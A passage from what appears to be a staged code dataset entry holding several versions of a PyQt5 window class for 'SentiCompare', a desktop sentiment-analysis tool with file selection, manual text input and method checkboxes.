self.input_output_box.setTabsClosable(False)\n self.input_output_box.setObjectName('input_output_box')\n self.file_view = QtWidgets.QListView(self.select_files_tab)\n self.file_view.setGeometry(QtCore.QRect(10, 10, 235, 210))\n self.file_view.setObjectName('file_view')\n self.file_view_model = QStandardItemModel(self.file_view)\n self.file_view.setModel(self.file_view_model)\n self.file_view.show()\n self.input_output_box.addTab(self.select_files_tab, '')\n self.add_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2\n )\n self.add_button.setFont(font)\n self.add_button.setObjectName('add_button')\n self.add_button.clicked.connect(self.selectFiles)\n self.horizontal_layout_2.addWidget(self.add_button)\n self.delete_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_2)\n self.delete_button.setFont(font)\n self.delete_button.setObjectName('delete_button')\n self.delete_button.clicked.connect(self.removeFiles)\n self.horizontal_layout_2.addWidget(self.delete_button)\n self.manual_input_tab = QtWidgets.QWidget()\n self.manual_input_tab.setObjectName('manual_input_tab')\n self.text_input = QtWidgets.QTextEdit(self.manual_input_tab)\n self.text_input.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.text_input.setObjectName('text_input')\n self.input_output_box.addTab(self.manual_input_tab, '')\n self.results_tab = QtWidgets.QWidget()\n self.results_tab.setObjectName('results_tab')\n self.results_scroll_box = QtWidgets.QScrollArea(self.results_tab)\n self.results_scroll_box.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.results_scroll_box.setWidgetResizable(True)\n self.results_scroll_box.setObjectName('results_scroll_box')\n self.results_content = QtWidgets.QWidget()\n self.results_content.setGeometry(QtCore.QRect(0, 0, 230, 250))\n self.results_content.setObjectName('results_content')\n self.results_scroll_box.setWidget(self.results_content)\n self.results_content_text = QtWidgets.QTextEdit(self.results_content)\n self.results_content_text.setGeometry(QtCore.QRect(-1, -1, 235, 250))\n self.results_content_text.setReadOnly(True)\n self.results_content_text.setObjectName('results_content_text')\n self.input_output_box.addTab(self.results_tab, '')\n self.input_output_box.setTabEnabled(2, False)\n font.setPointSize(14)\n self.group_box_1 = QtWidgets.QGroupBox(self.main_window)\n self.group_box_1.setGeometry(QtCore.QRect(280, 110, 160, 140))\n self.group_box_1.setFont(font)\n self.group_box_1.setTitle('')\n self.group_box_1.setAlignment(QtCore.Qt.AlignCenter)\n self.group_box_1.setFlat(False)\n self.group_box_1.setCheckable(False)\n self.group_box_1.setObjectName('group_box_1')\n self.vertical_layout_widget_1 = QtWidgets.QWidget(self.group_box_1)\n self.vertical_layout_widget_1.setGeometry(QtCore.QRect(9, 0, 141, 141))\n self.vertical_layout_widget_1.setObjectName('vertical_layout_widget_1')\n self.vertical_layout_1 = QtWidgets.QVBoxLayout(self.\n vertical_layout_widget_1)\n self.vertical_layout_1.setContentsMargins(0, 0, 0, 0)\n self.vertical_layout_1.setObjectName('vertical_layout_1')\n self.pronoun_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.pronoun_checkbox.setFont(font)\n self.pronoun_checkbox.setObjectName('pronoun_checkbox')\n self.vertical_layout_1.addWidget(self.pronoun_checkbox)\n self.lexical_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.lexical_checkbox.setFont(font)\n self.lexical_checkbox.setObjectName('lexical_checkbox')\n self.vertical_layout_1.addWidget(self.lexical_checkbox)\n self.rule_based_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.rule_based_checkbox.setFont(font)\n self.rule_based_checkbox.setObjectName('rule_based_checkbox')\n self.vertical_layout_1.addWidget(self.rule_based_checkbox)\n self.machine_learning_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.machine_learning_checkbox.setFont(font)\n self.machine_learning_checkbox.setObjectName(\n 'machine_learning_checkbox')\n self.vertical_layout_1.addWidget(self.machine_learning_checkbox)\n self.help_scroll_box = QtWidgets.QScrollArea(self.main_window)\n self.help_scroll_box.setGeometry(QtCore.QRect(280, 260, 160, 140))\n self.help_scroll_box.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.help_scroll_box.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.help_scroll_box.setWidgetResizable(True)\n self.help_scroll_box.setObjectName('help_scroll_box')\n self.help_content = QtWidgets.QWidget()\n self.help_content.setGeometry(QtCore.QRect(0, 0, 158, 138))\n self.help_content.setObjectName('help_content')\n self.help_scroll_box.setWidget(self.help_content)\n self.selected_files = {}\n self.input_output_box.setCurrentIndex(0)\n self.retranslateUI()\n QtCore.QMetaObject.connectSlotsByName(self.main_window)\n\n def retranslateUI(self):\n _translate = QtCore.QCoreApplication.translate\n self.main_window.setWindowTitle(_translate('main_window',\n 'SentiCompare'))\n self.add_button.setText(_translate('main_window', 'Add'))\n self.delete_button.setText(_translate('main_window', 'Delete'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .select_files_tab), _translate('main_window', 'Select Files'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .manual_input_tab), _translate('main_window', 'Manual Input'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .results_tab), _translate('main_window', 'Results'))\n self.run_button.setText(_translate('main_window', 'Run'))\n self.quit_button.setText(_translate('main_window', 'Quit'))\n self.pronoun_checkbox.setText(_translate('main_window',\n 'Pronoun Usage'))\n self.lexical_checkbox.setText(_translate('main_window', 'Lexical'))\n self.rule_based_checkbox.setText(_translate('main_window',\n 'Rule Based'))\n self.machine_learning_checkbox.setText(_translate('main_window',\n 'Machine Learning'))\n self.branding_label.setText(_translate('main_window', 'SentiCompare'))\n\n def showWindow(self):\n self.main_window.show()\n\n def selectFiles(self):\n file_dialog = FileDialog(self.main_window)\n file_dialog.setFilters(['Text files (*.txt)'])\n file_dialog.setDefaultFilterIndex = 0\n file_dialog.setDefaultDirectory(os.path.expanduser('~'))\n file_dialog.exec()\n if file_dialog.getPath() == '':\n return\n elif file_dialog.getFilename()[2] == '':\n for file in os.listdir(file_dialog.getPath()):\n if file.endswith('.txt') and not file.startswith('.'):\n file_path = os.path.join(file_dialog.getPath(), file)\n if file_path not in self.selected_files:\n self.selected_files[file] = file_path\n item = QStandardItem(file)\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n elif file_dialog.getPath() not in self.selected_files:\n self.selected_files[file_dialog.getFilename()[1]\n ] = file_dialog.getPath()\n item = QStandardItem(file_dialog.getFilename()[1])\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n <mask token>\n\n def run(self):\n if not (self.pronoun_checkbox.isChecked() or self.lexical_checkbox.\n isChecked() or self.rule_based_checkbox.isChecked() or self.\n machine_learning_checkbox.isChecked()):\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Parameters')\n message_box.setText(\n \"You haven't selected any methods of sentiment analysis. Please select at least one \"\n + 'method from the list of options.')\n message_box.exec_()\n return\n if self.input_output_box.currentIndex() == 2:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Select Input')\n message_box.setText(\n 'You must be on the \"Select Files\" page or the \"Manual Input\" page to run '\n +\n 'an analysis. Please select one of those pages and try again.')\n message_box.exec_()\n return\n else:\n progress_bar = QtWidgets.QProgressDialog(\n 'Running Sentiment Analysis...', 'Cancel', 0, 100, self.\n main_window)\n progress_bar.setValue(0)\n progress_bar.setCancelButton(None)\n progress_bar.setWindowModality(QtCore.Qt.WindowModal)\n progress_bar.resize(400, 50)\n progress_bar.show()\n if self.input_output_box.currentIndex() == 0:\n sentiment_analyzer = SentimentAnalyzer(self.selected_files,\n progress_bar, pronoun=self.pronoun_checkbox.isChecked(),\n lexical=self.lexical_checkbox.isChecked(), rule_based=\n self.rule_based_checkbox.isChecked(), machine_learning=\n self.machine_learning_checkbox.isChecked())\n else:\n sentiment_analyzer = SentimentAnalyzer(self.text_input.\n toPlainText(), progress_bar, pronoun=self.\n pronoun_checkbox.isChecked(), lexical=self.\n lexical_checkbox.isChecked(), rule_based=self.\n rule_based_checkbox.isChecked(), machine_learning=self.\n machine_learning_checkbox.isChecked())\n results = sentiment_analyzer.runAnalyses()\n progress_bar.close()\n if results:\n self.results_content_text.setText(results)\n self.input_output_box.setTabEnabled(2, True)\n self.input_output_box.setCurrentIndex(2)\n else:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Input')\n message_box.setText(\n \"You haven't added any input to analyze. Please select one or more files or \"\n + 'input some data manually.')\n message_box.exec_()\n return\n",
"step-3": "<mask token>\n\n\nclass UIMainWindow(object):\n\n def __init__(self):\n font = QtGui.QFont()\n font.setFamily('Myriad Pro')\n font.setPointSize(14)\n self.main_window = QtWidgets.QWidget()\n self.main_window.setFont(font)\n self.main_window.setObjectName('main_window')\n self.main_window.setWindowModality(QtCore.Qt.WindowModal)\n self.main_window.resize(450, 460)\n size_policy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed,\n QtWidgets.QSizePolicy.Fixed)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.main_window.sizePolicy().\n hasHeightForWidth())\n self.main_window.setSizePolicy(size_policy)\n self.main_window.setMinimumSize(QtCore.QSize(450, 460))\n self.main_window.setMaximumSize(QtCore.QSize(450, 460))\n self.main_window.setBaseSize(QtCore.QSize(450, 460))\n self.branding_icon = QtWidgets.QLabel(self.main_window)\n self.branding_icon.setGeometry(QtCore.QRect(20, 5, 90, 90))\n self.branding_icon.setText('')\n self.branding_icon.setPixmap(QtGui.QPixmap(\n '../images/senticompare_logo.png'))\n self.branding_icon.setAlignment(QtCore.Qt.AlignJustify | QtCore.Qt.\n AlignVCenter)\n self.branding_icon.setObjectName('branding_icon')\n self.branding_label = QtWidgets.QLabel(self.main_window)\n self.branding_label.setGeometry(QtCore.QRect(110, 5, 330, 90))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n self.branding_label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily('Optima')\n font.setPointSize(50)\n self.branding_label.setFont(font)\n self.branding_label.setObjectName('branding_label')\n self.horizontal_layout_widget_1 = QtWidgets.QWidget(self.main_window)\n self.horizontal_layout_widget_1.setGeometry(QtCore.QRect(10, 410, \n 430, 50))\n self.horizontal_layout_widget_1.setObjectName(\n 'horizontal_layout_widget_1')\n self.horizontal_layout_1 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_1)\n self.horizontal_layout_1.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_1.setObjectName('horizontal_layout_1')\n self.run_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1\n )\n self.run_button.setObjectName('run_button')\n self.run_button.clicked.connect(self.run)\n self.horizontal_layout_1.addWidget(self.run_button)\n self.quit_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_1)\n self.quit_button.setObjectName('quit_button')\n self.quit_button.clicked.connect(self.main_window.close)\n self.horizontal_layout_1.addWidget(self.quit_button)\n self.select_files_tab = QtWidgets.QWidget()\n self.select_files_tab.setObjectName('select_files_tab')\n self.horizontal_layout_widget_2 = QtWidgets.QWidget(self.\n select_files_tab)\n self.horizontal_layout_widget_2.setGeometry(QtCore.QRect(10, 230, \n 230, 50))\n self.horizontal_layout_widget_2.setObjectName(\n 'horizontal_layout_widget_2')\n self.horizontal_layout_2 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_2)\n self.horizontal_layout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_2.setObjectName('horizontal_layout_2')\n font.setFamily('Myriad Pro')\n font.setPointSize(12)\n self.input_output_box = QtWidgets.QTabWidget(self.main_window)\n self.input_output_box.setGeometry(QtCore.QRect(10, 100, 260, 300))\n self.input_output_box.setFont(font)\n self.input_output_box.setCursor(QtGui.QCursor(QtCore.Qt.\n PointingHandCursor))\n self.input_output_box.setTabPosition(QtWidgets.QTabWidget.North)\n self.input_output_box.setTabShape(QtWidgets.QTabWidget.Rounded)\n self.input_output_box.setTabsClosable(False)\n self.input_output_box.setObjectName('input_output_box')\n self.file_view = QtWidgets.QListView(self.select_files_tab)\n self.file_view.setGeometry(QtCore.QRect(10, 10, 235, 210))\n self.file_view.setObjectName('file_view')\n self.file_view_model = QStandardItemModel(self.file_view)\n self.file_view.setModel(self.file_view_model)\n self.file_view.show()\n self.input_output_box.addTab(self.select_files_tab, '')\n self.add_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2\n )\n self.add_button.setFont(font)\n self.add_button.setObjectName('add_button')\n self.add_button.clicked.connect(self.selectFiles)\n self.horizontal_layout_2.addWidget(self.add_button)\n self.delete_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_2)\n self.delete_button.setFont(font)\n self.delete_button.setObjectName('delete_button')\n self.delete_button.clicked.connect(self.removeFiles)\n self.horizontal_layout_2.addWidget(self.delete_button)\n self.manual_input_tab = QtWidgets.QWidget()\n self.manual_input_tab.setObjectName('manual_input_tab')\n self.text_input = QtWidgets.QTextEdit(self.manual_input_tab)\n self.text_input.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.text_input.setObjectName('text_input')\n self.input_output_box.addTab(self.manual_input_tab, '')\n self.results_tab = QtWidgets.QWidget()\n self.results_tab.setObjectName('results_tab')\n self.results_scroll_box = QtWidgets.QScrollArea(self.results_tab)\n self.results_scroll_box.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.results_scroll_box.setWidgetResizable(True)\n self.results_scroll_box.setObjectName('results_scroll_box')\n self.results_content = QtWidgets.QWidget()\n self.results_content.setGeometry(QtCore.QRect(0, 0, 230, 250))\n self.results_content.setObjectName('results_content')\n self.results_scroll_box.setWidget(self.results_content)\n self.results_content_text = QtWidgets.QTextEdit(self.results_content)\n self.results_content_text.setGeometry(QtCore.QRect(-1, -1, 235, 250))\n self.results_content_text.setReadOnly(True)\n self.results_content_text.setObjectName('results_content_text')\n self.input_output_box.addTab(self.results_tab, '')\n self.input_output_box.setTabEnabled(2, False)\n font.setPointSize(14)\n self.group_box_1 = QtWidgets.QGroupBox(self.main_window)\n self.group_box_1.setGeometry(QtCore.QRect(280, 110, 160, 140))\n self.group_box_1.setFont(font)\n self.group_box_1.setTitle('')\n self.group_box_1.setAlignment(QtCore.Qt.AlignCenter)\n self.group_box_1.setFlat(False)\n self.group_box_1.setCheckable(False)\n self.group_box_1.setObjectName('group_box_1')\n self.vertical_layout_widget_1 = QtWidgets.QWidget(self.group_box_1)\n self.vertical_layout_widget_1.setGeometry(QtCore.QRect(9, 0, 141, 141))\n self.vertical_layout_widget_1.setObjectName('vertical_layout_widget_1')\n self.vertical_layout_1 = QtWidgets.QVBoxLayout(self.\n vertical_layout_widget_1)\n self.vertical_layout_1.setContentsMargins(0, 0, 0, 0)\n self.vertical_layout_1.setObjectName('vertical_layout_1')\n self.pronoun_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.pronoun_checkbox.setFont(font)\n self.pronoun_checkbox.setObjectName('pronoun_checkbox')\n self.vertical_layout_1.addWidget(self.pronoun_checkbox)\n self.lexical_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.lexical_checkbox.setFont(font)\n self.lexical_checkbox.setObjectName('lexical_checkbox')\n self.vertical_layout_1.addWidget(self.lexical_checkbox)\n self.rule_based_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.rule_based_checkbox.setFont(font)\n self.rule_based_checkbox.setObjectName('rule_based_checkbox')\n self.vertical_layout_1.addWidget(self.rule_based_checkbox)\n self.machine_learning_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.machine_learning_checkbox.setFont(font)\n self.machine_learning_checkbox.setObjectName(\n 'machine_learning_checkbox')\n self.vertical_layout_1.addWidget(self.machine_learning_checkbox)\n self.help_scroll_box = QtWidgets.QScrollArea(self.main_window)\n self.help_scroll_box.setGeometry(QtCore.QRect(280, 260, 160, 140))\n self.help_scroll_box.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.help_scroll_box.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.help_scroll_box.setWidgetResizable(True)\n self.help_scroll_box.setObjectName('help_scroll_box')\n self.help_content = QtWidgets.QWidget()\n self.help_content.setGeometry(QtCore.QRect(0, 0, 158, 138))\n self.help_content.setObjectName('help_content')\n self.help_scroll_box.setWidget(self.help_content)\n self.selected_files = {}\n self.input_output_box.setCurrentIndex(0)\n self.retranslateUI()\n QtCore.QMetaObject.connectSlotsByName(self.main_window)\n\n def retranslateUI(self):\n _translate = QtCore.QCoreApplication.translate\n self.main_window.setWindowTitle(_translate('main_window',\n 'SentiCompare'))\n self.add_button.setText(_translate('main_window', 'Add'))\n self.delete_button.setText(_translate('main_window', 'Delete'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .select_files_tab), _translate('main_window', 'Select Files'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .manual_input_tab), _translate('main_window', 'Manual Input'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .results_tab), _translate('main_window', 'Results'))\n self.run_button.setText(_translate('main_window', 'Run'))\n self.quit_button.setText(_translate('main_window', 'Quit'))\n self.pronoun_checkbox.setText(_translate('main_window',\n 'Pronoun Usage'))\n self.lexical_checkbox.setText(_translate('main_window', 'Lexical'))\n self.rule_based_checkbox.setText(_translate('main_window',\n 'Rule Based'))\n self.machine_learning_checkbox.setText(_translate('main_window',\n 'Machine Learning'))\n self.branding_label.setText(_translate('main_window', 'SentiCompare'))\n\n def showWindow(self):\n self.main_window.show()\n\n def selectFiles(self):\n file_dialog = FileDialog(self.main_window)\n file_dialog.setFilters(['Text files (*.txt)'])\n file_dialog.setDefaultFilterIndex = 0\n file_dialog.setDefaultDirectory(os.path.expanduser('~'))\n file_dialog.exec()\n if file_dialog.getPath() == '':\n return\n elif file_dialog.getFilename()[2] == '':\n for file in os.listdir(file_dialog.getPath()):\n if file.endswith('.txt') and not file.startswith('.'):\n file_path = os.path.join(file_dialog.getPath(), file)\n if file_path not in self.selected_files:\n self.selected_files[file] = file_path\n item = QStandardItem(file)\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n elif file_dialog.getPath() not in self.selected_files:\n self.selected_files[file_dialog.getFilename()[1]\n ] = file_dialog.getPath()\n item = QStandardItem(file_dialog.getFilename()[1])\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n\n def removeFiles(self):\n for i in range(self.file_view_model.rowCount() - 1, -1, -1):\n if self.file_view_model.item(i).checkState():\n filename = self.file_view_model.item(i).text()\n del self.selected_files[filename]\n self.file_view_model.removeRow(i)\n\n def run(self):\n if not (self.pronoun_checkbox.isChecked() or self.lexical_checkbox.\n isChecked() or self.rule_based_checkbox.isChecked() or self.\n machine_learning_checkbox.isChecked()):\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Parameters')\n message_box.setText(\n \"You haven't selected any methods of sentiment analysis. Please select at least one \"\n + 'method from the list of options.')\n message_box.exec_()\n return\n if self.input_output_box.currentIndex() == 2:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Select Input')\n message_box.setText(\n 'You must be on the \"Select Files\" page or the \"Manual Input\" page to run '\n +\n 'an analysis. Please select one of those pages and try again.')\n message_box.exec_()\n return\n else:\n progress_bar = QtWidgets.QProgressDialog(\n 'Running Sentiment Analysis...', 'Cancel', 0, 100, self.\n main_window)\n progress_bar.setValue(0)\n progress_bar.setCancelButton(None)\n progress_bar.setWindowModality(QtCore.Qt.WindowModal)\n progress_bar.resize(400, 50)\n progress_bar.show()\n if self.input_output_box.currentIndex() == 0:\n sentiment_analyzer = SentimentAnalyzer(self.selected_files,\n progress_bar, pronoun=self.pronoun_checkbox.isChecked(),\n lexical=self.lexical_checkbox.isChecked(), rule_based=\n self.rule_based_checkbox.isChecked(), machine_learning=\n self.machine_learning_checkbox.isChecked())\n else:\n sentiment_analyzer = SentimentAnalyzer(self.text_input.\n toPlainText(), progress_bar, pronoun=self.\n pronoun_checkbox.isChecked(), lexical=self.\n lexical_checkbox.isChecked(), rule_based=self.\n rule_based_checkbox.isChecked(), machine_learning=self.\n machine_learning_checkbox.isChecked())\n results = sentiment_analyzer.runAnalyses()\n progress_bar.close()\n if results:\n self.results_content_text.setText(results)\n self.input_output_box.setTabEnabled(2, True)\n self.input_output_box.setCurrentIndex(2)\n else:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Input')\n message_box.setText(\n \"You haven't added any input to analyze. Please select one or more files or \"\n + 'input some data manually.')\n message_box.exec_()\n return\n",
"step-4": "import os\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QStandardItem, QStandardItemModel\nfrom PyQt5.QtWidgets import QMessageBox\nfrom src import FileDialog, SentimentAnalyzer\n\n\nclass UIMainWindow(object):\n\n def __init__(self):\n font = QtGui.QFont()\n font.setFamily('Myriad Pro')\n font.setPointSize(14)\n self.main_window = QtWidgets.QWidget()\n self.main_window.setFont(font)\n self.main_window.setObjectName('main_window')\n self.main_window.setWindowModality(QtCore.Qt.WindowModal)\n self.main_window.resize(450, 460)\n size_policy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed,\n QtWidgets.QSizePolicy.Fixed)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.main_window.sizePolicy().\n hasHeightForWidth())\n self.main_window.setSizePolicy(size_policy)\n self.main_window.setMinimumSize(QtCore.QSize(450, 460))\n self.main_window.setMaximumSize(QtCore.QSize(450, 460))\n self.main_window.setBaseSize(QtCore.QSize(450, 460))\n self.branding_icon = QtWidgets.QLabel(self.main_window)\n self.branding_icon.setGeometry(QtCore.QRect(20, 5, 90, 90))\n self.branding_icon.setText('')\n self.branding_icon.setPixmap(QtGui.QPixmap(\n '../images/senticompare_logo.png'))\n self.branding_icon.setAlignment(QtCore.Qt.AlignJustify | QtCore.Qt.\n AlignVCenter)\n self.branding_icon.setObjectName('branding_icon')\n self.branding_label = QtWidgets.QLabel(self.main_window)\n self.branding_label.setGeometry(QtCore.QRect(110, 5, 330, 90))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n self.branding_label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily('Optima')\n font.setPointSize(50)\n self.branding_label.setFont(font)\n self.branding_label.setObjectName('branding_label')\n self.horizontal_layout_widget_1 = QtWidgets.QWidget(self.main_window)\n self.horizontal_layout_widget_1.setGeometry(QtCore.QRect(10, 410, \n 430, 50))\n self.horizontal_layout_widget_1.setObjectName(\n 'horizontal_layout_widget_1')\n self.horizontal_layout_1 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_1)\n self.horizontal_layout_1.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_1.setObjectName('horizontal_layout_1')\n self.run_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1\n )\n self.run_button.setObjectName('run_button')\n self.run_button.clicked.connect(self.run)\n self.horizontal_layout_1.addWidget(self.run_button)\n self.quit_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_1)\n self.quit_button.setObjectName('quit_button')\n self.quit_button.clicked.connect(self.main_window.close)\n self.horizontal_layout_1.addWidget(self.quit_button)\n self.select_files_tab = QtWidgets.QWidget()\n self.select_files_tab.setObjectName('select_files_tab')\n self.horizontal_layout_widget_2 = QtWidgets.QWidget(self.\n select_files_tab)\n self.horizontal_layout_widget_2.setGeometry(QtCore.QRect(10, 230, \n 230, 50))\n self.horizontal_layout_widget_2.setObjectName(\n 'horizontal_layout_widget_2')\n self.horizontal_layout_2 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_2)\n self.horizontal_layout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_2.setObjectName('horizontal_layout_2')\n font.setFamily('Myriad Pro')\n font.setPointSize(12)\n self.input_output_box = QtWidgets.QTabWidget(self.main_window)\n self.input_output_box.setGeometry(QtCore.QRect(10, 100, 260, 300))\n self.input_output_box.setFont(font)\n self.input_output_box.setCursor(QtGui.QCursor(QtCore.Qt.\n PointingHandCursor))\n self.input_output_box.setTabPosition(QtWidgets.QTabWidget.North)\n self.input_output_box.setTabShape(QtWidgets.QTabWidget.Rounded)\n self.input_output_box.setTabsClosable(False)\n self.input_output_box.setObjectName('input_output_box')\n self.file_view = QtWidgets.QListView(self.select_files_tab)\n self.file_view.setGeometry(QtCore.QRect(10, 10, 235, 210))\n self.file_view.setObjectName('file_view')\n self.file_view_model = QStandardItemModel(self.file_view)\n self.file_view.setModel(self.file_view_model)\n self.file_view.show()\n self.input_output_box.addTab(self.select_files_tab, '')\n self.add_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2\n )\n self.add_button.setFont(font)\n self.add_button.setObjectName('add_button')\n self.add_button.clicked.connect(self.selectFiles)\n self.horizontal_layout_2.addWidget(self.add_button)\n self.delete_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_2)\n self.delete_button.setFont(font)\n self.delete_button.setObjectName('delete_button')\n self.delete_button.clicked.connect(self.removeFiles)\n self.horizontal_layout_2.addWidget(self.delete_button)\n self.manual_input_tab = QtWidgets.QWidget()\n self.manual_input_tab.setObjectName('manual_input_tab')\n self.text_input = QtWidgets.QTextEdit(self.manual_input_tab)\n self.text_input.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.text_input.setObjectName('text_input')\n self.input_output_box.addTab(self.manual_input_tab, '')\n self.results_tab = QtWidgets.QWidget()\n self.results_tab.setObjectName('results_tab')\n self.results_scroll_box = QtWidgets.QScrollArea(self.results_tab)\n self.results_scroll_box.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.results_scroll_box.setWidgetResizable(True)\n self.results_scroll_box.setObjectName('results_scroll_box')\n self.results_content = QtWidgets.QWidget()\n self.results_content.setGeometry(QtCore.QRect(0, 0, 230, 250))\n self.results_content.setObjectName('results_content')\n self.results_scroll_box.setWidget(self.results_content)\n self.results_content_text = QtWidgets.QTextEdit(self.results_content)\n self.results_content_text.setGeometry(QtCore.QRect(-1, -1, 235, 250))\n self.results_content_text.setReadOnly(True)\n self.results_content_text.setObjectName('results_content_text')\n self.input_output_box.addTab(self.results_tab, '')\n self.input_output_box.setTabEnabled(2, False)\n font.setPointSize(14)\n self.group_box_1 = QtWidgets.QGroupBox(self.main_window)\n self.group_box_1.setGeometry(QtCore.QRect(280, 110, 160, 140))\n self.group_box_1.setFont(font)\n self.group_box_1.setTitle('')\n self.group_box_1.setAlignment(QtCore.Qt.AlignCenter)\n self.group_box_1.setFlat(False)\n self.group_box_1.setCheckable(False)\n self.group_box_1.setObjectName('group_box_1')\n self.vertical_layout_widget_1 = QtWidgets.QWidget(self.group_box_1)\n self.vertical_layout_widget_1.setGeometry(QtCore.QRect(9, 0, 141, 141))\n self.vertical_layout_widget_1.setObjectName('vertical_layout_widget_1')\n self.vertical_layout_1 = QtWidgets.QVBoxLayout(self.\n vertical_layout_widget_1)\n self.vertical_layout_1.setContentsMargins(0, 0, 0, 0)\n self.vertical_layout_1.setObjectName('vertical_layout_1')\n self.pronoun_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.pronoun_checkbox.setFont(font)\n 